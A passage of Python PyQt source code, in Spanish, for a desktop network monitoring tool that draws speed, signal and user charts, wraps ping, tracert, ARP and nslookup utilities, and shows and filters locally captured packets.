\"))\r\n pr=db.consultarPROBLEMAS_RED()\r\n enc=False\r\n for NE in pr:\r\n if NE[4]!=\"Corregido\":\r\n aux=pendientesClass(NE,self.inf.TEMA,self.inf)\r\n disp.addWidget(aux)\r\n enc=True\r\n if enc==False:\r\n aux=QFrame(self)\r\n Layout = QGridLayout()\r\n label = QLabel(self)\r\n pixmap = QPixmap('Imagenes/CORRECTO.png').scaled(50,50)\r\n label.setPixmap(pixmap)\r\n Aux2=QWidget()\r\n Aux = QHBoxLayout()\r\n Aux2.setLayout(Aux)\r\n Layout.addWidget(label,0,0)\r\n Layout.addWidget(QLabel(\"\"),0,1)\r\n Layout.addWidget(QLabel(\"Excelente, sin pendientes\"),0,2)\r\n Layout.addWidget(QLabel(\"\"),0,3)\r\n if self.inf.TEMA==\"Obscuro\":\r\n aux.setStyleSheet(\"QLabel{border-color:black;} QFrame{Background-color:#1f232a; Border-Radius:10px; }\")\r\n else:\r\n aux.setStyleSheet(\"QLabel{border-color:gray;} QFrame{Background-color:#D8D8D8; Border-Radius:10px; }\")\r\n aux.setLayout(Layout)\r\n disp.addWidget(aux)\r\n aux2=QWidget()\r\n aux2.setLayout(disp)\r\n aux2.setContentsMargins(0,0,0,0)\r\n self.ui.WidgetPend.setWidget(aux2)\r\n def crearGraficaUser(self):\r\n if self.inf.TEMA==\"Obscuro\":\r\n enc=[\"\",\"\"]\r\n else:\r\n enc=[\"\",\"\"]\r\n series = QBarSeries()\r\n d=db.consultar(\"SELECT R.ID_RED, R.SSID,C.MAC_HOST FROM CONTROL_RED_ESPECIFICA AS C INNER JOIN RED AS R ON R.ID_RED=C.ID_RED ORDER BY R.ID_RED\")\r\n datos=[]\r\n redv=\"\"\r\n cont=0\r\n for i in d:\r\n if redv!=i[1]:\r\n datos.append([i[1],1])\r\n cont+=1 \r\n else:\r\n datos[cont-1][1]=datos[cont-1][1]+1 \r\n redv=i[1]\r\n for i in datos:\r\n set = QBarSet(i[0])\r\n set.append(i[1])\r\n series.append(set)\r\n series.setLabelsVisible(False)\r\n cat=QBarCategoryAxis()\r\n cat.append([\"Usuarios\"])\r\n chart =QChart()\r\n if self.inf.TEMA==\"Obscuro\":\r\n chart.setBackgroundVisible(False)\r\n else:\r\n chart.setBackgroundVisible(True)\r\n chart.addSeries(series)\r\n chart.createDefaultAxes()\r\n chart.setAxisX(cat,series)\r\n chart.setAnimationOptions(QChart.SeriesAnimations)\r\n chart.setTitle(enc[0]+\"Numero de usuarios en redes\"+enc[1])\r\n chart.legend().setVisible(True)\r\n chart.legend().setAlignment(Qt.AlignBottom)\r\n chartV = QChartView(chart)\r\n chartV.setRenderHint(QPainter.Antialiasing)\r\n aux=QWidget()\r\n layout=QHBoxLayout()\r\n layout.addWidget(chartV)\r\n aux.setLayout(layout)\r\n self.ui.WidgetUser.setWidget(aux)\r\n def crearGraficaVel(self):\r\n if self.inf.TEMA==\"Obscuro\":\r\n enc=[\"\",\"\"]\r\n else:\r\n enc=[\"\",\"\"]\r\n series = QLineSeries()\r\n series2 = QLineSeries()\r\n series3= QLineSeries()\r\n series4 = QLineSeries()\r\n series5 = QLineSeries()\r\n aux=self.PromedioVel()\r\n r=db.consultar(f\"SELECT ID_RED,SUBIDA,BAJADA FROM RED WHERE SSID='{self.inf.SSID}'\")\r\n try:\r\n subida=r[0][1] \r\n bajada=r[0][2]\r\n except:\r\n subida=0 \r\n bajada=0\r\n series.setName(enc[0]+\"Subida\"+enc[1])\r\n series2.setName(enc[0]+\"Bajada\"+enc[1])\r\n series4.setName(enc[0]+f\"{subida}\"+enc[1])\r\n series4.setColor(\"red\")\r\n series5.setName(enc[0]+f\"{bajada}\"+enc[1])\r\n series5.setColor(\"red\")\r\n series3.hide()\r\n if self.inf.CONEXION==True:\r\n dias=0\r\n if len(aux)<7:\r\n for i in aux:\r\n dias+=1\r\n series3.append(dias,0)\r\n series3.append(dias,subida+10)\r\n series3.append(dias,bajada+10)\r\n series.append(dias,i[1])\r\n series2.append(dias,i[2])\r\n series4.append(dias,subida)\r\n series5.append(dias,bajada)\r\n else:\r\n dias2=0\r\n for i in aux:\r\n if dias>len(aux)-7:\r\n dias2+=1\r\n series3.append(dias,0)\r\n series3.append(dias,subida+10)\r\n series3.append(dias,bajada+10)\r\n series.append(dias2,i[1])\r\n series2.append(dias2,i[2])\r\n series4.append(dias2,subida)\r\n series5.append(dias2,bajada)\r\n dias+=1\r\n else:\r\n series.append(0,0)\r\n series2.append(0,0)\r\n series3.append(0,0)\r\n series4.append(0,0)\r\n series5.append(0,0)\r\n chart =QChart()\r\n if self.inf.TEMA==\"Obscuro\":\r\n chart.setBackgroundVisible(False)\r\n else:\r\n chart.setBackgroundVisible(True)\r\n chart.addSeries(series)\r\n chart.addSeries(series2)\r\n chart.addSeries(series3)\r\n chart.addSeries(series4)\r\n chart.addSeries(series5)\r\n chart.createDefaultAxes()\r\n chart.setAnimationOptions(QChart.SeriesAnimations)\r\n chart.setTitle(enc[0]+\"Registro de velocidad de los ultimos 7 Días\"+enc[1])\r\n chart.legend().setVisible(True)\r\n chart.legend().setAlignment(Qt.AlignBottom)\r\n\r\n chartV = QChartView(chart)\r\n chartV.setRenderHint(QPainter.Antialiasing)\r\n aux=QWidget()\r\n layout=QHBoxLayout()\r\n layout.addWidget(chartV)\r\n aux.setLayout(layout)\r\n self.ui.WidgetVeloci.setWidget(aux)\r\n def crearGraficaSignal(self):\r\n try:\r\n try: senal=float(rs.obtenerIntencidad(self.inf.INTERFAZ).replace(\"%\",\"\"))\r\n except:senal=0\r\n pie=QPieSeries()\r\n if self.inf.CONEXION==True:\r\n if \"ETHERNET\" in self.inf.INTERFAZ.upper() and \"ETHER\" in self.inf.INTERFAZ.upper():\r\n senal=100\r\n pie.append(\"Señal (Alámbrico)\",senal)\r\n pie.append(\"Perdida\",0)\r\n else: \r\n pie.append(\"Señal\",senal)\r\n pie.append(\"Perdida\",100-senal)\r\n else:\r\n pie.append(\"Señal\",0)\r\n pie.append(\"Perdida\",100)\r\n chart =QChart()\r\n if self.inf.TEMA==\"Obscuro\":\r\n enc=[\"\",\"\"]\r\n chart.setBackgroundVisible(False)\r\n else:\r\n enc=[\"\",\"\"]\r\n chart.setBackgroundVisible(True)\r\n chart.createDefaultAxes()\r\n chart.setTitle(enc[0]+\"Señal de la red \"+self.inf.SSID+f\" ({senal}%)\"+enc[1])\r\n chart.addSeries(pie)\r\n chartV = QChartView(chart)\r\n chartV.setRenderHint(QPainter.Antialiasing)\r\n aux=QWidget()\r\n layout=QHBoxLayout()\r\n layout.addWidget(chartV)\r\n aux.setLayout(layout)\r\n self.ui.WidgetSenal.setWidget(aux)\r\n except:\r\n pass\r\n\r\n def actualizarDatosDash(self):\r\n INTER=rs.obtenerDatosInter(self.inf.INTERFAZ)\r\n \r\n self.ui.DatosRed.setText(\r\n f\"\"\"\r\n

Datos de Red Actual
___________________________________________

\r\n

\r\n Nombre Interfaz: {self.inf.INTERFAZ}
\r\n Descripción:
  {INTER[1]}
\r\n SSID: {self.inf.SSID}
\r\n Tipo de radio: {INTER[3]}
\r\n Banda: {INTER[4]}
\r\n Velocidad de Transmision: {INTER[5]} Mbps
\r\n Velocidad de Recepción: {INTER[6]} Mbps
\r\n Señal: {INTER[7]}
\r\n Dirección IPv4: {self.inf.getIPV4()}
\r\n Puerta de Enlace: {self.inf.GATEWAY}
\r\n Sub-Máscara de red: {self.inf.MASCARA}
\r\n

\r\n \"\"\"\r\n )\r\n\r\n def Gestion(self):\r\n self.BorrarFormatos()\r\n self.formato(self.ui.GestionBtn)\r\n self.ui.Contenidos.setCurrentWidget(self.ui.pGest) \r\n self.ui.SalidaGestion.resizeRowsToContents()\r\n for i in range(0,self.ui.SalidaGestion.columnCount()):\r\n self.ui.SalidaGestion.setColumnWidth(i,self.ui.SalidaGestion.width()/self.ui.SalidaGestion.columnCount())\r\n def Reportes(self):\r\n self.BorrarFormatos()\r\n self.formato(self.ui.RerportesBtn)\r\n self.ui.Contenidos.setCurrentWidget(self.ui.pReport)\r\n def Trafico(self):\r\n self.BorrarFormatos()\r\n self.formato(self.ui.TraficoBtn)\r\n self.ui.Contenidos.setCurrentWidget(self.ui.pTraf)\r\n self.ui.TablaPaquetes.resizeRowsToContents()\r\n for i in range(0,self.ui.TablaPaquetes.columnCount()): self.ui.TablaPaquetes.setColumnWidth(i,self.ui.TablaPaquetes.width()/self.ui.TablaPaquetes.columnCount())\r\n def Utilidades(self):\r\n self.BorrarFormatos()\r\n self.formato(self.ui.UtilidadesBtn)\r\n self.ui.Contenidos.setCurrentWidget(self.ui.pUtil) \r\n \r\n def IPCONFIG(self):\r\n self.BorrarFormatos2()\r\n self.formato(self.ui.IPConfBtn)\r\n self.ui.ContenidosU.setCurrentWidget(self.ui.IPConfigPag) \r\n def PING(self):\r\n self.BorrarFormatos2()\r\n self.formato(self.ui.PingBtn)\r\n self.ui.ContenidosU.setCurrentWidget(self.ui.PingPag) \r\n self.ui.PINGOUT.resizeRowsToContents()\r\n for i in range(0,self.ui.PINGOUT.columnCount()): self.ui.PINGOUT.setColumnWidth(i,self.ui.PINGOUT.width()/self.ui.PINGOUT.columnCount())\r\n def TRACERT(self):\r\n self.BorrarFormatos2()\r\n self.formato(self.ui.TracerBtn)\r\n self.ui.ContenidosU.setCurrentWidget(self.ui.TracertPag) \r\n def ARP(self):\r\n self.BorrarFormatos2()\r\n self.formato(self.ui.ArpBtn)\r\n dis=rs.Obtener_Dispositivos(True)\r\n self.ui.BarDis.clear()\r\n for i in dis:\r\n if i[5] != '--' and i[3]!='127.0.0.1':\r\n self.ui.BarDis.addItem(i[0]+\":\"+i[3])\r\n self.ui.ContenidosU.setCurrentWidget(self.ui.ARPPag) \r\n def ROUTE(self):\r\n self.BorrarFormatos2()\r\n self.formato(self.ui.RouteBtn)\r\n self.ui.ContenidosU.setCurrentWidget(self.ui.RoutePag) \r\n def NS(self):\r\n self.BorrarFormatos2()\r\n self.formato(self.ui.NSLookBtn)\r\n self.ui.ContenidosU.setCurrentWidget(self.ui.NSPag) \r\n def BorrarFormatos(self):\r\n u=self.ui\r\n if self.inf.TEMA==\"Obscuro\":\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n else:\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} \"\r\n u.DashboardBtn.setStyleSheet(style)\r\n u.GestionBtn.setStyleSheet(style)\r\n u.RerportesBtn.setStyleSheet(style)\r\n u.TraficoBtn.setStyleSheet(style)\r\n u.UtilidadesBtn.setStyleSheet(style)\r\n u.VelocidadBtn.setStyleSheet(style)\r\n def BorrarFormatos2(self):\r\n u=self.ui\r\n if self.inf.TEMA==\"Obscuro\":\r\n style=\"QPushButton:hover{background-color:#1f232a;}QPushButton:pressed{\tbackground-color:#343b47;}\"\r\n else:\r\n style=\"QPushButton:hover{background-color:#909090;}\"\r\n u.IPConfBtn.setStyleSheet(style)\r\n u.PingBtn.setStyleSheet(style)\r\n u.ArpBtn.setStyleSheet(style)\r\n u.TracerBtn.setStyleSheet(style)\r\n u.RouteBtn.setStyleSheet(style)\r\n u.IPConfBtn.setStyleSheet(style)\r\n u.NSLookBtn.setStyleSheet(style)\r\n def formato(self,boton):\r\n if self.inf.TEMA==\"Obscuro\":\r\n style=\"QPushButton{background-color:#1f132a;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n else:\r\n style=\"border: 1px solid;border-color:#D8D8D8;\"\r\n\r\n boton.setStyleSheet(style)\r\n ping=\"\"\r\n procPing=False\r\n def utilidadPingIniciar(self):\r\n if self.procPing==False:\r\n self.procPing=True\r\n self.ui.PingIniciarBtn.setStyleSheet(\"border-radius:10px;background-color: #20945e;\tpadding: 8px 8px;\")\r\n self.ping=\"\"\r\n busqueda = Thread(target=self.utilidadPingIniciarH)\r\n busqueda.start()\r\n else:\r\n self.procPing=False\r\n registros=0\r\n tmpBytes=\"\"\r\n\r\n def putPing(self):\r\n if \"[!]\" in self.ping:\r\n self.ping=self.ping.replace(\"\\n\",\"
\")\r\n self.ui.label_35.setText(f\"{self.ping}\")\r\n else:\r\n valores=self.ping.split(\" \")\r\n self.ui.label_35.setText(f\"Haciendo ping a {valores[1]}\")\r\n valores[6]=valores[6].replace(\"tiempo<\",\"tiempo=<\")\r\n self.ui.PINGOUT.insertRow(self.registros)\r\n self.ui.PINGOUT.setItem(self.registros,0,QTableWidgetItem(valores[0]))\r\n self.ui.PINGOUT.setItem(self.registros,1,QTableWidgetItem(valores[1]))\r\n if \"inaccesible\" in self.ping:\r\n self.ui.PINGOUT.setItem(self.registros,3,QTableWidgetItem(\"Inaccesible\"))\r\n self.ui.PINGOUT.setItem(self.registros,4,QTableWidgetItem(\"Inaccesible\"))\r\n self.ui.PINGOUT.setItem(self.registros,2,QTableWidgetItem(\"Inaccesible\"))\r\n elif \"agotado\" in self.ping:\r\n self.ui.PINGOUT.setItem(self.registros,2,QTableWidgetItem(\"Agotado\"))\r\n self.ui.PINGOUT.setItem(self.registros,3,QTableWidgetItem(\"Agotado\"))\r\n self.ui.PINGOUT.setItem(self.registros,4,QTableWidgetItem(\"Agotado\"))\r\n else:\r\n if \"bytes=\" in self.ping:\r\n self.ui.PINGOUT.setItem(self.registros,2,QTableWidgetItem(valores[5].replace(\"bytes=\",\"\")))\r\n self.ui.PINGOUT.setItem(self.registros,3,QTableWidgetItem(valores[6].replace(\"tiempo=\",\"\")))\r\n self.ui.PINGOUT.setItem(self.registros,4,QTableWidgetItem(valores[7].replace(\"TTL=\",\"\")))\r\n else:\r\n self.ui.PINGOUT.setItem(self.registros,2,QTableWidgetItem(self.tmpBytes))\r\n self.ui.PINGOUT.setItem(self.registros,3,QTableWidgetItem(valores[5].replace(\"tiempo=\",\"\")))\r\n self.ui.PINGOUT.setItem(self.registros,4,QTableWidgetItem(\"64\"))\r\n self.registros+=1\r\n def utilidadPingIniciarH(self):\r\n print(\"UTILIDAD: INICIAR PING\")\r\n self.registros=0\r\n self.tmpBytes=self.ui.ping3.text()\r\n self.ui.PINGOUT.clearContents()\r\n a= self.ui.PINGOUT.rowCount()\r\n for i in range(0,a): self.ui.PINGOUT.removeRow(i)\r\n util.utilidad_Ping(self.ui.ping1.toPlainText(),self.ui.ping12.text(),self.ui.ping2.text(),self.tmpBytes,self.ui.ping4.text(),self)\r\n if self.inf.TEMA==\"Obscuro\":\r\n self.ui.PingIniciarBtn.setStyleSheet(\"border-radius:10px;background-color: #16191d;\tpadding: 8px 8px;\")\r\n else:\r\n self.ui.PingIniciarBtn.setStyleSheet(\"border-radius:10px;background-color: #D8D8D8;\tpadding: 8px 8px;\")\r\n\r\n def utilidadPingAyuda(self):\r\n var=util.help_ping()\r\n var=var.replace(\"Opci¢n incorrecta --help.\",\"\")\r\n var=var.replace(\"\\n\",\"
\")\r\n var=var.replace(\"\\t\",\"    \")\r\n var=var.replace(\"ú\",\"u\")\r\n if self.inf.TEMA==\"Obscuro\":\r\n self.ui.label_35.setText(f\"{var}\")\r\n else:\r\n self.ui.label_35.setText(f\"{var}\")\r\n def IPCMANUAL(self):\r\n util.IPCMANUAL(self.ui.ParamIp.toPlainText(),self.ui.SalidaIPConf)\r\n def IPCAll(self):\r\n util.IPCAll(self.ui.SalidaIPConf)\r\n def IPCDDNS(self):\r\n util.IPCDDNS(self.ui.SalidaIPConf)\r\n def IPCFDNS(self):\r\n util.IPCFDNS(self.ui.SalidaIPConf)\r\n def IPCRDNS(self):\r\n util.IPCRDNS(self.ui.SalidaIPConf)\r\n def IPCAYUDA(self):\r\n util.IPCAYUDA(self.ui.SalidaIPConf)\r\n def ARPA(self):\r\n util.ARPA(self.ui.SalidaARP)\r\n def ARPC(self):\r\n util.ARPC(self.ui.arp6.text(), self.ui.SalidaARP,self.inf.INTERFAZ)\r\n def ARPADD(self):\r\n util.ARPADD(self.ui.arp4.text(),self.ui.arp3.text(),self.ui.BarDis.itemText(self.ui.BarDis.currentIndex()).split(\":\")[1],self.ui.SalidaARP)\r\n def ARPAY(self):\r\n util.ARPAY(self.ui.SalidaARP)\r\n def ARPR(self):\r\n util.ARPR(self.ui.arp8.text(),self.ui.BarDis.itemText(self.ui.BarDis.currentIndex()).split(\":\")[1],self.ui.SalidaARP)\r\n def NSLOI(self):\r\n util.NSLOI(self.ui.nslo1.text(),self.ui.nslo2.text(),self.ui.textEdit)\r\n def NSLOA(self):\r\n util.NSLOA(self.ui.textEdit)\r\n def tracertA(self):\r\n util.tracertA(self.ui.SalidaTracert)\r\n def tracertI(self):\r\n util.tracertI(self.ui.tracert0.text(),self.ui.tracert1.text(),self.ui.tracert2.text(),self.ui.tracert3.text(),self.ui.tracert4.isChecked(),self.ui.tracert5.isChecked(),self.ui.SalidaTracert)\r\n procesoT=False\r\n def trafico(self):\r\n if self.TrafObj.Cerrar==False:\r\n a= self.ui.TablaPaquetes.rowCount()\r\n self.paquetes=1\r\n for i in range(1,a): self.ui.TablaPaquetes.removeRow(i)\r\n self.ui.TablaPaquetes.clearContents()\r\n self.TrafObj.Cerrar=True\r\n self.ui.InicioTraficoBtn.setStyleSheet(\"border-radius:10px;background-color: #20945e;\tpadding: 8px 8px;\")\r\n hilotrafico=Thread(target=self.captura)\r\n hilotrafico.start()\r\n else:\r\n self.TrafObj.Cerrar=False\r\n if self.inf.TEMA==\"Obscuro\":\r\n self.ui.InicioTraficoBtn.setStyleSheet(\"border-radius:10px;background-color: #16191d;\tpadding: 8px 8px;\")\r\n else:\r\n self.ui.InicioTraficoBtn.setStyleSheet(\"background-color:#D8D8D8;border-radius:10px;padding: 8px 8px;\")\r\n def captura(self):\r\n rs.monitor(self.inf.INTERFAZ,self.signalTrafico,self.TrafObj,self.inf)\r\n paquetes=1\r\n SalidaPaq=False\r\n def dominios(self):\r\n if self.SalidaPaq==False:\r\n self.ui.TituloSalidaPaq.setText(\"Dominios capturados\")\r\n self.animacion_Vertical_Inicio(0,200,500,self.ui.SalidaPaq)\r\n texto=\"\"\r\n with open('modulos/BasesDatos/Dominios.txt', \"r\",encoding=\"utf-8\") as archivo_lectura:\r\n for linea in archivo_lectura:\r\n texto+=linea+\"
\"\r\n self.ui.TextoSalidaPaq.setHtml(texto)\r\n self.SalidaPaq=True\r\n else:\r\n self.SalidaPaq=False\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.SalidaPaq)\r\n def salirPaq(self):\r\n self.SalidaPaq=False\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.SalidaPaq)\r\n def Doubleclick(self):\r\n self.ui.TituloSalidaPaq.setText(\"Información del Paquete\")\r\n for idx in self.ui.TablaPaquetes.selectionModel().selectedIndexes():\r\n row_number = idx.row()\r\n file=open('modulos/BasesDatos/sniff.pcap','r',encoding='utf-8')\r\n contenido=file.readlines()[int(self.ui.TablaPaquetes.item(row_number,0).text())]\r\n if self.SalidaPaq==False:\r\n self.animacion_Vertical_Inicio(0,200,500,self.ui.SalidaPaq)\r\n self.SalidaPaq=True\r\n self.ui.TextoSalidaPaq.setHtml(rs.formatoPaquete(contenido))\r\n else:\r\n self.ui.TextoSalidaPaq.setHtml(rs.formatoPaquete(contenido))\r\n file.close()\r\n FiltrarP=\"\"\r\n \r\n def FiltrarPaquete(self):\r\n self.paquetes=0\r\n self.FiltrarP=self.ui.Filtrado.text()\r\n if self.FiltrarP.replace(\" \",\"\")==\"\":\r\n for i in range(0,self.ui.TablaPaquetes.rowCount()): self.ui.TablaPaquetes.removeRow(i)\r\n self.ui.TablaPaquetes.setRowCount(0)\r\n with open(\"modulos/BasesDatos/sniff.pcap\", \"r\",encoding=\"utf-8\") as archivo_lectura:\r\n for linea in archivo_lectura:\r\n aux=rs.get_data(str(linea))\r\n self.ui.TablaPaquetes.insertRow(self.paquetes)\r\n self.ui.TablaPaquetes.setItem(self.paquetes,0,QTableWidgetItem(str(aux[0])))\r\n protocolo=QTableWidgetItem(aux[2])\r\n protocolo.setForeground(QColor(255, 255, 255))\r\n if str(aux[2]) == \"TCP\": \r\n protocolo.setBackground(QColor(86, 82, 100))\r\n elif str(aux[2]) == \"UDP\": protocolo.setBackground(QColor(83, 153, 176))\r\n elif str(aux[2]) == \"ICMP\": protocolo.setBackground(QColor(21, 52, 80))\r\n elif str(aux[2]) == \"ARP\": protocolo.setBackground(QColor(41, 64, 82))\r\n elif str(aux[2]) == \"DNS\": protocolo.setBackground(QColor(105, 162, 151))\r\n else: protocolo.setBackground(QColor(80, 128, 142))\r\n\r\n self.ui.TablaPaquetes.setItem(self.paquetes,0,QTableWidgetItem(aux[0]))\r\n self.ui.TablaPaquetes.setItem(self.paquetes,1,QTableWidgetItem(str(aux[1])))\r\n self.ui.TablaPaquetes.setItem(self.paquetes,2,protocolo)\r\n self.ui.TablaPaquetes.setItem(self.paquetes,3,QTableWidgetItem(str(aux[3])))\r\n self.ui.TablaPaquetes.setItem(self.paquetes,4,QTableWidgetItem(str(aux[4])))\r\n self.ui.TablaPaquetes.setItem(self.paquetes,5,QTableWidgetItem(str(aux[5])))\r\n self.ui.TablaPaquetes.setItem(self.paquetes,6,QTableWidgetItem(str(aux[6])))\r\n self.paquetes+=1\r\n else:\r\n for i in range(0,self.ui.TablaPaquetes.rowCount()): self.ui.TablaPaquetes.removeRow(i)\r\n self.ui.TablaPaquetes.setRowCount(0)\r\n with open(\"modulos/BasesDatos/sniff.pcap\", \"r\",encoding=\"utf-8\") as archivo_lectura:\r\n for linea in archivo_lectura:\r\n if self.FiltrarP.upper() in linea.upper():\r\n aux=rs.get_data(str(linea))\r\n self.ui.TablaPaquetes.insertRow(self.paquetes)\r\n protocolo=QTableWidgetItem(aux[2])\r\n protocolo.setForeground(QColor(255, 255, 255))\r\n if str(aux[2]) == \"TCP\": protocolo.setBackground(QColor(86, 82, 100))\r\n elif str(aux[2]) == \"UDP\": protocolo.setBackground(QColor(83, 153, 176))\r\n elif str(aux[2]) == \"ICMP\": protocolo.setBackground(QColor(21, 52, 80))\r\n elif str(aux[2]) == \"ARP\": protocolo.setBackground(QColor(41, 64, 82))\r\n elif str(aux[2]) == \"DNS\": protocolo.setBackground(QColor(105, 162, 151))\r\n else: protocolo.setBackground(QColor(80, 128, 142))\r\n\r\n self.ui.TablaPaquetes.setItem(self.paquetes,0,QTableWidgetItem(str(aux[0])))\r\n self.ui.TablaPaquetes.setItem(self.paquetes,1,QTableWidgetItem(str(aux[1])))\r\n self.ui.TablaPaquetes.setItem(self.paquetes,2,protocolo)\r\n self.ui.TablaPaquetes.setItem(self.paquetes,3,QTableWidgetItem(str(aux[3])))\r\n self.ui.TablaPaquetes.setItem(self.paquetes,4,QTableWidgetItem(str(aux[4])))\r\n self.ui.TablaPaquetes.setItem(self.paquetes,5,QTableWidgetItem(str(aux[5])))\r\n self.ui.TablaPaquetes.setItem(self.paquetes,6,QTableWidgetItem(str(aux[6])))\r\n self.paquetes+=1\r\n def BorrarTabla(self):\r\n self.TrafObj.borrar=True\r\n a= self.ui.TablaPaquetes.rowCount()\r\n self.paquetes=1\r\n for i in range(1,a): self.ui.TablaPaquetes.removeRow(i)\r\n self.ui.TablaPaquetes.clearContents()\r\n Salida=open('modulos/BasesDatos/sniff.pcap',\"w\",encoding=\"utf-8\")\r\n Salida.close()\r\n indicador=\"PR\"\r\n indicadorV=\"\"\r\n def DBBorrarFormatos(self):\r\n u=self.ui\r\n if self.inf.TEMA==\"Obscuro\":\r\n style=\"QPushButton{text-align:center; border-top-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n else:\r\n style=\"QPushButton{text-align:center; border-top-left-radius: 10px;}QPushButton::hover{background-color:#D8D8D8;}\"\r\n u.G_PR.setStyleSheet(style)\r\n u.G_R.setStyleSheet(style)\r\n u.G_I.setStyleSheet(style)\r\n u.G_P.setStyleSheet(style)\r\n u.G_RD.setStyleSheet(style)\r\n u.G_C.setStyleSheet(style)\r\n u.G_H.setStyleSheet(style)\r\n u.G_CR.setStyleSheet(style)\r\n u.G_SU.setStyleSheet(style)\r\n u.G_D.setStyleSheet(style)\r\n def seccionadoDB(self,boton,ind):\r\n self.DBBorrarFormatos()\r\n self.formato(boton)\r\n self.indicador=ind\r\n self.DBcerrarMenuAct()\r\n Filtrado=\"*_*_*\"\r\n Filtrado2=\"*_*_*\"\r\n def FiltrarSpeed(self):\r\n aux=self.ui.FiltradoSpeed.text()\r\n if aux==\" \" or aux==\"\\t\":\r\n self.Filtrado2=\"*_*_*\"\r\n else:\r\n self.Filtrado2=aux\r\n self.DBPruebas()\r\n def agregarF(self,tabla,aux,num):\r\n reg=0\r\n if self.Filtrado==\"*_*_*\":\r\n for i in aux:\r\n tabla.insertRow(reg)\r\n for a in range(0,num):\r\n if \"BIEN\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(114, 110, 255))\r\n tabla.setItem(reg,a,formato)\r\n elif \"REGULAR\" in str(i[a]).upper() or \"NO VERIFICADO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(255, 103, 50))\r\n tabla.setItem(reg,a,formato)\r\n elif \"MAL\" in str(i[a]).upper() or \"NO CORREGIDO\" in str(i[a]).upper() or \"NO PERMITIDO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(255, 79, 97))\r\n tabla.setItem(reg,a,formato)\r\n elif \"CORRECTO\" in str(i[a]).upper() or \"CORREGIDO\" in str(i[a]).upper() or \"LIBRE\" in str(i[a]).upper() or \"EXCELENTE\" in str(i[a]).upper() or \"VERIFICADO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(67, 144, 67))\r\n tabla.setItem(reg,a,formato)\r\n else:\r\n tabla.setItem(reg,a,QTableWidgetItem(str(i[a])))\r\n reg+=1\r\n else:\r\n for i in aux:\r\n if self.filtradoV(self.Filtrado.upper(),str(i).upper())==True:\r\n tabla.insertRow(reg)\r\n for a in range(0,num):\r\n if \"BIEN\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(114, 110, 255))\r\n tabla.setItem(reg,a,formato)\r\n elif \"REGULAR\" in str(i[a]).upper() or \"NO VERIFICADO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(255, 103, 50))\r\n tabla.setItem(reg,a,formato)\r\n elif \"MAL\" in str(i[a]).upper() or \"NO CORREGIDO\" in str(i[a]).upper() or \"NO PERMITIDO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(255, 79, 97))\r\n tabla.setItem(reg,a,formato)\r\n elif \"CORRECTO\" in str(i[a]).upper() or \"CORREGIDO\" in str(i[a]).upper() or \"LIBRE\" in str(i[a]).upper() or \"EXCELENTE\" in str(i[a]).upper() or \"VERIFICADO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(67, 144, 67))\r\n tabla.setItem(reg,a,formato)\r\n else:\r\n tabla.setItem(reg,a,QTableWidgetItem(str(i[a])))\r\n reg+=1\r\n tabla.resizeRowsToContents()\r\n for i in range(0,tabla.columnCount()):\r\n tabla.setColumnWidth(i,tabla.width()/tabla.columnCount())\r\n\r\n def agregarFS(self,tabla,aux,num):\r\n reg=0\r\n if self.Filtrado2==\"*_*_*\":\r\n for i in aux:\r\n tabla.insertRow(reg)\r\n for a in range(0,num):\r\n if \"BIEN\" in str(i[a]).upper() or \"BUENO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(114, 110, 255))\r\n tabla.setItem(reg,a,formato)\r\n elif \"REGULAR\" in str(i[a]).upper() or \"NO VERIFICADO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(255, 103, 50))\r\n tabla.setItem(reg,a,formato)\r\n elif \"MAL\" in str(i[a]).upper() or \"NO CORREGIDO\" in str(i[a]).upper() or \"NO PERMITIDO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(255, 79, 97))\r\n tabla.setItem(reg,a,formato)\r\n elif \"CORRECTO\" in str(i[a]).upper() or \"CORREGIDO\" in str(i[a]).upper() or \"LIBRE\" in str(i[a]).upper() or \"EXCELENTE\" in str(i[a]).upper() or \"VERIFICADO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setBackground(QColor(67, 144, 67))\r\n formato.setForeground(QColor(255, 255, 255))\r\n tabla.setItem(reg,a,formato)\r\n else:\r\n tabla.setItem(reg,a,QTableWidgetItem(str(i[a])))\r\n reg+=1\r\n else:\r\n for i in aux:\r\n if self.filtradoV(self.Filtrado2.upper(),str(i).upper())==True:\r\n tabla.insertRow(reg)\r\n for a in range(0,num):\r\n 